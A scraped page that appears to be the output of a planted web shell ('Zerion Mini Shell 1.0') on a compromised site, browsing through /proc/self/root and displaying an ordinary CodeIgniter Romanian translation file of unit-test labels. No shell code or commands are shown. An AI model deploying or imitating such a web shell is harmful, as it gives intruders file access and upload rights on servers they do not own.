ok

Mini Shell

Direktori : /proc/self/root/home2/selectio/www/mm-tailor-billing/lib/language/romanian/
Upload File :
Current File : //proc/self/root/home2/selectio/www/mm-tailor-billing/lib/language/romanian/unit_test_lang.php

<?php
/**
 * System messages translation for CodeIgniter(tm)
 *
 * @author	CodeIgniter community
 * @author  Cristian Robert Chiribuc
 * @copyright	Copyright (c) 2014 - 2015, British Columbia Institute of Technology (http://bcit.ca/)
 * @license	http://opensource.org/licenses/MIT	MIT License
 * @link	http://codeigniter.com
 */
defined('BASEPATH') OR exit('No direct script access allowed');

$lang['ut_test_name']		= 'Nume Test';
$lang['ut_test_datatype']	= 'Test Tip de Date';
$lang['ut_res_datatype']	= 'Tipuri de Date Așteptate';
$lang['ut_result']			= 'Rezultat';
$lang['ut_undefined']		= 'Nume Test Nedefinit';
$lang['ut_file']			= 'Nume Fișier';
$lang['ut_line']			= 'Numărul Liniei';
$lang['ut_passed']			= 'Trecut';
$lang['ut_failed']			= 'Eșuat';
$lang['ut_boolean']			= 'Boolean';
$lang['ut_integer']			= 'Integru';
$lang['ut_float']			= 'Float';
$lang['ut_double']			= 'Float'; // can be the same as float
$lang['ut_string']			= 'String';
$lang['ut_array']			= 'Array';
$lang['ut_object']			= 'Object';
$lang['ut_resource']		= 'Resurse';
$lang['ut_null']			= 'Nul';
$lang['ut_notes']			= 'Notițe';

Zerion Mini Shell 1.0